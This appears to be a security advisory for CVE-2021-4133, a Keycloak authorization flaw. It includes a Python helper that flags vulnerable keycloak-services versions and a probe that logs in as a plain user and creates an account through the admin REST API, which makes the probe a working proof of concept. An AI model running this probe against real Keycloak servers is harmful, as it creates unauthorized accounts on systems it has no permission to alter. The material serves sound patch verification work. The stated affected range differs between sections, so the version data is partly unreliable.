CVE-2021-4133
Improper Authorization in Keycloak
8.8
HIGH
CVSS 3.1
EPSS 0.43%
Description
An incorrect authorization flaw was found in Keycloak (versions from 12.0.0 and before 15.1.1). It allows an attacker with any existing user account to create new default user accounts via the administrative REST API, even when new-user registration is disabled for the realm.
How to fix CVE-2021-4133
To remediate CVE-2021-4133, upgrade the affected package to a fixed version below.
- Maven/org.keycloak:keycloak-services—upgrade to 15.1.1 or later
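Two practical checks to go with the upgrade, written as an added example (this is not Keycloak project code): first, scan `mvn dependency:list` output for `org.keycloak:keycloak-services` versions below the fixed 15.1.1; second, after upgrading, confirm that an ordinary realm user can no longer reach `POST /admin/realms/{realm}/users`, the admin REST endpoint for creating users. The sample dependency lines are constructed, and the host `kc.example`, the realm `demo` and the user credentials in the `__main__` block are placeholders. The base URL includes `/auth` for the WildFly-based distributions that shipped in the affected range.

```python
"""CVE-2021-4133 helper: flag vulnerable keycloak-services versions and
probe whether a low-privileged user can still create accounts.
Added example, not Keycloak project code."""
import json
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import List, Tuple

FIXED = (15, 1, 1)  # first fixed release, from the advisory
ARTIFACT = "org.keycloak:keycloak-services"

# Constructed sample of `mvn dependency:list` output (not real build output).
SAMPLE_DEPENDENCY_LIST = [
    "[INFO] The following files have been resolved:",
    "[INFO]    org.keycloak:keycloak-services:jar:15.0.2:compile",
    "[INFO]    org.keycloak:keycloak-core:jar:15.0.2:compile",
    "[INFO]    org.keycloak:keycloak-services:jar:15.1.1:compile",
]


def parse_version(v: str) -> Tuple[int, ...]:
    """Numeric prefix of a Maven version, e.g. '15.0.2.Final' -> (15, 0, 2)."""
    m = re.match(r"(\d+(?:\.\d+)*)", v)
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    return tuple(int(x) for x in m.group(1).split("."))


def is_vulnerable(version: str) -> bool:
    """True when version < 15.1.1 (the listed affected range: from 0, < 15.1.1)."""
    v = parse_version(version)
    width = max(len(v), len(FIXED))
    return v + (0,) * (width - len(v)) < FIXED + (0,) * (width - len(FIXED))


def scan_dependency_list(lines: List[str]) -> List[str]:
    """Return vulnerable keycloak-services versions found in dependency:list
    output. Coordinates look like group:artifact:type[:classifier]:version:scope,
    so the version is always the second-to-last field."""
    hits = []
    for line in lines:
        for tok in line.split():
            if tok.startswith(ARTIFACT + ":"):
                fields = tok.split(":")
                if len(fields) >= 5 and is_vulnerable(fields[-2]):
                    hits.append(fields[-2])
    return hits


def build_create_user_request(base_url: str, realm: str, token: str,
                              username: str) -> urllib.request.Request:
    """The admin call an ordinary user must not be able to make:
    POST /admin/realms/{realm}/users with a minimal UserRepresentation."""
    url = f"{base_url.rstrip('/')}/admin/realms/{urllib.parse.quote(realm)}/users"
    body = json.dumps({"username": username, "enabled": True}).encode()
    return urllib.request.Request(
        url, data=body, method="POST",
        headers={"Authorization": f"Bearer {token}",
                 "Content-Type": "application/json"})


def password_grant(base_url: str, realm: str, username: str, password: str) -> str:
    """Token for a plain realm user via the realm's built-in public admin-cli client."""
    url = f"{base_url.rstrip('/')}/realms/{urllib.parse.quote(realm)}/protocol/openid-connect/token"
    data = urllib.parse.urlencode({"grant_type": "password", "client_id": "admin-cli",
                                   "username": username, "password": password}).encode()
    with urllib.request.urlopen(urllib.request.Request(url, data=data)) as resp:
        return json.load(resp)["access_token"]


def probe(base_url: str, realm: str, user: str, password: str, new_user: str) -> bool:
    """True if the low-privileged user could create an account (still vulnerable).
    A fixed server refuses the call; 401/403 both count as rejected."""
    token = password_grant(base_url, realm, user, password)
    try:
        with urllib.request.urlopen(build_create_user_request(base_url, realm, token, new_user)) as resp:
            return resp.status == 201
    except urllib.error.HTTPError as e:
        if e.code in (401, 403):
            return False
        raise


if __name__ == "__main__":
    print("vulnerable versions in build:", scan_dependency_list(SAMPLE_DEPENDENCY_LIST))
    # Placeholder target; run against a test realm with a throwaway user only.
    # print("still vulnerable:", probe("https://kc.example/auth", "demo",
    #                                  "plainuser", "password", "cve-2021-4133-probe"))
```

Run the probe only against a test realm with a disposable account: on an unpatched server it really does create the user, so clean up afterwards. If the upgrade is done via the Keycloak server distribution rather than a Maven dependency, the version scan does not apply and the REST probe is the check to rely on.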
Is CVE-2021-4133 being exploited?
Low. EPSS is 0.43%, a low estimated probability of exploitation in the wild over the next 30 days. EPSS is a forecast, not evidence of observed attacks, and the flaw is reachable over the network by any authenticated user, so the upgrade is still warranted.
Affected packages (1)
- from 0, < 15.1.1
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH 8.8 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |